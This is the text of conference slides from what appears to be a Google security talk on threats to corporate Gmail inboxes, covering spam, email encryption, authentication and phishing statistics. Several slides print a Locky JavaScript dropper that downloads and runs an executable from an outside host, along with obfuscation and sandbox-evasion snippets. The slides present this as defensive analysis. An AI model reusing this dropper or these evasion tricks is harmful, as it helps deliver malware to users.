Elie Bursztein with the help of many Googlers @elie Targeted Attacks Against Corporate Inboxes - a Gmail Perspective SESSION ID: HT-R11
Apr 12, 2017
Elie Bursztein with the help of many Googlers @elie
Targeted Attacks Against Corporate Inboxes - a Gmail Perspective
SESSION ID: HT-R11
g.co/research/protect
1.X BILLION USERS
g.co/research/protect
Stopping hundred of billions of attacks every week
g.co/research/protect
1x
A corporate inbox receives 4.3x more malware than an end-user inbox
4.3x
g.co/research/protect
Science related German companies get 9.6x more phishing attempts than their US counterpart
9.6x
1x
g.co/research/protect
Highlight how various Gmail group of users exhibits different threat profiles
g.co/research/protect
Global trends
g.co/research/protect
Global trends
Organization trends
g.co/research/protect
Global trends
Countries trends
Organization trends
Global trends
Spam
PhishingSpam
Phishing ImpersonationSpam
Phishing MalwareImpersonationSpam
Phishing InterceptionMalwareImpersonationSpam
g.co/research/protect
Spam
g.co/research/protect
Google embraces deep learning
Android Gmail Photos Maps NLP Robotics research Speech Translation YouTube … many others ...
g.co/research/protect
Deep-learning for photos auto-tagging
“ocean”Deep ConvolutionalNeural Network
Automatic TagUser photo
g.co/research/protect
Deep Learning power Google photos search
“Wow, the new Google photo search is a bit
insane. I didn’t tag those”
“Google photo search is awesome. Searched with
keyword drawing to find all my scribble at once :D”
g.co/research/protect
g.co/research/protect
Tensor power unit
We do deep-learning efficiently and at Google scale thanks to dedicated ASICs
https://cloudplatform.googleblog.com/2016/05/Google-supercharges-machine-learning-tasks-with-custom-chip.html
Using deep-learning allows us stay ahead of spammers
g.co/research/protect
Interception
g.co/research/protect
Encrypting email in transit with STARTTLS
Sender (Alice)
g.co/research/protect
Encrypting email in transit with STARTTLS
Sender (Alice)
Mail server (smtp.source.com)
g.co/research/protect
Encrypting email in transit with STARTTLS
Mail server (smtp.destination.com)
Sender (Alice)
Mail server (smtp.source.com)
Recipient (Bob)
g.co/research/protect
Encrypting email in transit with STARTTLS
Mail server (smtp.destination.com)
Eavesdropper (Eve)
Sender (Alice)
Mail server (smtp.source.com)
Recipient (Bob)
g.co/research/protect
80% 87%
g.co/research/protect
Transparency report - June 2014
https://googleblog.blogspot.com/2014/06/transparency-report-protecting-emails.html
g.co/research/protect
Transparency report
Inbound traffic Outbound traffic
Frac
tion
of e
mai
l enc
rypt
ed
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
2013-12
2014-03
2014-06
2014-09
2014-12
2015-03
2015-06
2015-09
2015-12
2016-03
2016-06
2016-09
2016-12
g.co/research/protect
Broken lock UI - February 2016
g.co/research/protect
Broken lock UI
Inbound traffic Outbound traffic
Frac
tion
of e
mai
l enc
rypt
ed
0%
10%
20%
30%
40%
50%
60%
70%
80%
90%
2013-12
2014-03
2014-06
2014-09
2014-12
2015-03
2015-06
2015-09
2015-12
2016-03
2016-06
2016-09
2016-12
Increasing encryption visibility helped speed-up adoption
g.co/research/protect
Next: SMTP strict transport security
Prevent MITM using rogue certificate Like HTTPS pinning for email
Coming soon!
Industry wide effort via MAAWG and IETF Google, Microsoft, Yahoo, Comcast are all on board
SMTP Strict Transport security is the next big milestone
g.co/research/protect
Impersonation
g.co/research/protect
DKIMDM
ARC
SPF
g.co/research/protect
DKIMDM
ARC
SPF
Sign your email cryptographically
g.co/research/protect
DKIMDM
ARC
SPF
Sign your email cryptographically
Specify which email servers to trust
g.co/research/protect
DKIMDM
ARC
SPF
Sign your email cryptographically
Specify which email servers to trust
Define what to do with fake
emails
g.co/research/protect
Surfacing authentication status
Authenticated Not authenticated
https://blog.google/products/gmail/making-email-safer-for-you-posted-by/
g.co/research/protect
Authentication over-time
https://security.googleblog.com/2013/12/internet-wide-efforts-to-fight-email.html
Dec 2016Dec 2015Dec 2014
5.8% 2.8% 1.8%
Most emails are authenticated
DMARC adoption is too low
g.co/research/protect
Phishing
g.co/research/protect
Targeted financial phishing is on the rise
g.co/research/protect
Malware
Ransomware largest malware threat
g.co/research/protect
g.co/research/protect
Lucky seen by Gmail vs Internet - May 2016
Normalized by number of email, a hash is potentially used in many email
emai
l
g.co/research/protect
Locky is part of a complex ecosystem
LockyDridex
g.co/research/protect
Locky vs Dridex daily pattern - May 2016
Locky
Dridex
Rise of Javascript dropper as a means to evade anti-virus
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
Get temp directory
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
Get temp directory
Fetch payload
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
Get temp directory
Fetch payload
Write payload to disk
g.co/research/protect
Anatomy of a Locky dropper
var shell = new ActiveXObject("WScript.Shell");var tmpDir = shell.ExpandEnvironmentStrings("%TEMP%");// fetch the payloadvar xhr = new ActiveXObject("MSXML2.XMLHTTP");xhr.open("GET","http://shady.ru/payload.exe",false);xhr.send(null);var payload = xhr.responseBody;// write payload to diskvar writer = ActiveXObject("ADODB.Stream");writer.open();writer.type = 2;writer.write(payload);writer.SaveToFile(tmpDir + "\\payload.exe");// execute the payloadshell.Run(tmpDir + "\\payload.exe", "", false);
Get temp directory
Fetch payload
Execute payload
Write payload to disk
g.co/research/protect
g.co/research/protect
g.co/research/protect
Locky May 5th attack
20 000 m/h
Internal detector Commercial Anti-virus
Num
ber o
f em
ail b
lock
ed
1x
10x
100x
1000x
04-05 23:00
04-06 0:00
04-06 1:00
04-06 2:00
04-06 3:00
04-06 4:00
04-06 5:00
04-06 6:00
04-06 7:00
04-06 8:00
04-06 9:00
04-06 10:00
04-06 11:00
04-06 12:00
04-06 13:00
04-06 14:00
04-06 15:00
04-06 16:00
04-06 17:00
04-06 18:00
g.co/research/protect
30 000 000 m/hLocky May 5th attack
20 000 m/h
Internal detector Commercial Anti-virus
Num
ber o
f em
ail b
lock
ed
1x
10x
100x
1000x
04-05 23:00
04-06 0:00
04-06 1:00
04-06 2:00
04-06 3:00
04-06 4:00
04-06 5:00
04-06 6:00
04-06 7:00
04-06 8:00
04-06 9:00
04-06 10:00
04-06 11:00
04-06 12:00
04-06 13:00
04-06 14:00
04-06 15:00
04-06 16:00
04-06 17:00
04-06 18:00
g.co/research/protect
Evasion attempts via file type switch
g.co/research/protect
AV DDOS exploit via malicious comments
Comment sample
g.co/research/protect
Javascript obfuscation - Property access
String.prototype.foo = function() { return this.substr(1,1); };namespaces = ('a', 'b', "ip");select = "W";fireWith = "gt".foo();origName = (fireWith.split((1,"b")), "Scr");mozMatchesSelector = (((18 ^ rbracket), (1332 / delegateTarget)), (((162, rscriptType) / (13 & preFilter)), this));bind = mozMatchesSelector[select + origName + namespaces + fireWith];…subtract = bind[noConflict + finalDataType + percent](define + focusin + clientTop);…slideUp = subtract[mouseenter + andSelf + isReady + fireWith + matchesSelector + matchIndexes](JSON + ownerDocument) + file + now;
WScript
g.co/research/protect
Sandbox detection va timer check
var t1 = new Date().getMilliseconds(); WScript.Sleep(10); var t2 = new Date().getMilliseconds(); if (t2-t1 <= 10) WScript.Quit();
HoneyClients don't sleep
Emulation detected!
g.co/research/protect
OS check via the use of Jscript specific behavior
b(); var greet = (function b() { }, "hello");
b is defined and hoisted only in JScript
b.foo(); var greet = (function b() { }, "hello"); function b.prototype.foo() { } not valid ES3/5/6
http.option(1) = true not valid ES6
Organizational trends
g.co/research/protect
Professional inbox are 6.2x more targeted by phishing and 4.3x more targeted by malware than end user inbox
1.0x
1.0x
1.0x
0.4x
6.2x
4.3x
GSuiteGmail
Spam
Phishing
Malware
Organization type insights
g.co/research/protect
A corporate inbox is 3.2x more targeted by phishing email than an EDU inbox
1.0x
1.8x
1.2x
3.2x
Education
Governement related
Non Profit
Company
g.co/research/protect
Non-profit inboxes are 2.3x more targeted by malware than corporate inboxes
2.1x
1.3x
2.3x
1.0x
Education
Governement related
Non Profit
Company
g.co/research/protect
A corporate inbox receive 3.1x more encrypted emails than an EDU inbox
1.0x
1.2x
1.3x
3.1x
Education
Governement related
Non Profit
Company
Company sectors insights
g.co/research/protect
Entertainment, IT and housing related companies are the most targeted by spam as of Q1 2017
1.0x1.3x
1.5x1.5x1.5x
1.7x1.8x
2.2x2.5x2.6x2.6x2.6x
2.7x4.3x
4.9x6.1x
UtilitiesFinance and Insurance
Natural ressourcesManufacturingAdministrative
Wholesale TradeManagement
TransportationScience
ConstructionAccommodation & Food
HealthRetail Trade
HousingInformation Technology
Entertainment
g.co/research/protect
Finance, Arts and IT related companies are the most targeted by phishing as of Q1 2017
1.0x8.6x
1.2x1.8x
1.6x1.9x
1.4x4.9x
2.8x1.8x
1.5x3.3x
2.8x4.3x
6.9x7.6x
UtilitiesFinance and Insurance
Natural ressourcesManufacturingAdministrative
Wholesale TradeManagement
TransportationScience
ConstructionAccommodation & Food
HealthRetail Trade
HousingInformation Technology
Entertainment
g.co/research/protect
Volume of phishing attempts depend of country and sector
> 10x
1.0x
1.8x
2.8x
3.2x
3.2x
4.4x
5.8x
1.9x
1.4x
1.2x
1.0x
1.7x
1.2x
Finance sector IT sector
France
Canada
USA
India
UK
Japan
Brazil
g.co/research/protect
Entertainment and utilities related companies are the one who received the most encrypted emails as of Q1 2017
1.3x1.0x
1.2x1.2x
1.2x1.2x
1.3x1.3x
1.3x1.1x
1.3x1.2x
1.2x1.1x
1.2x1.3x
UtilitiesFinance and Insurance
Natural ressourcesManufacturingAdministrative
Wholesale TradeManagement
TransportationScience
ConstructionAccommodation & Food
HealthRetail Trade
HousingInformation Technology
Entertainment
g.co/research/protect
Real estate is by far the sector that is the most targeted by malware as of Q1 2017
1.0x
1.1x
1.2x
1.3x
1.4x
1.7x
1.7x
2.0x
2.2x
2.2x
2.3x
2.4x
3.6x
4.5x
Science
Health Care
Wholesale Trade
Entertainment
Finance and Insurance
Manufacturing
Information Technology
Administrative
Mining
Accommodation and Food
Retail Trade
Utilities
Construction
Transportation
Real Estate > 10x
Countries trends
g.co/research/protect
EU is not at the forefront of email security
STARTTLS DKIM
1.2x
1.1x
1.0x
1.2x
1.1x
1.0x
1.1x
1.1x
1.1x
1.1x
USA
Japan
Brazil
India
UK
France
Canada
Germany
Korea
Australia
1.4x
1.0x
1.6x
1.6x
1.3x
1.4x
1.5x
1.2x
1.6x
1.5x
USA
Japan
Brazil
India
UK
France
Canada
Germany
Korea
Australia
g.co/research/protect
India and Japan have the most spammed Inboxes as of Q1 2017
2.0x
4.1x
2.7x
3.8x
1.3x
1.0x
1.6x
1.2x
1.8x
1.1x
USA
Japan
Brazil
India
UK
France
Canada
Germany
Korea
Australia
g.co/research/protect
The largest spammers in the world target other countries
1. USA 2. Germany 3. France 4. Japan 5. United Kingdom 6. Roumania 7. Spain 8. Brazil 9. Canada 10.Russia
g.co/research/protect
Japan inboxes are heavily targeted by phishing as of Q1 2017.
2.1x
5.9x
3.5x
1.7x
1.9x
1.0x
3.0x
1.6x
1.1x
1.7x
USA
Japan
Brazil
India
UK
France
Canada
Germany
Korea
Australia
g.co/research/protect
Recap
Deep-learning is providing the edge we need to combat email abuse
Transparency helps driving adoption of security technologies through the eco-system
Each organization has a unique threat profile that should be considered when prioritizing defenses
Thanks g.co/research/protect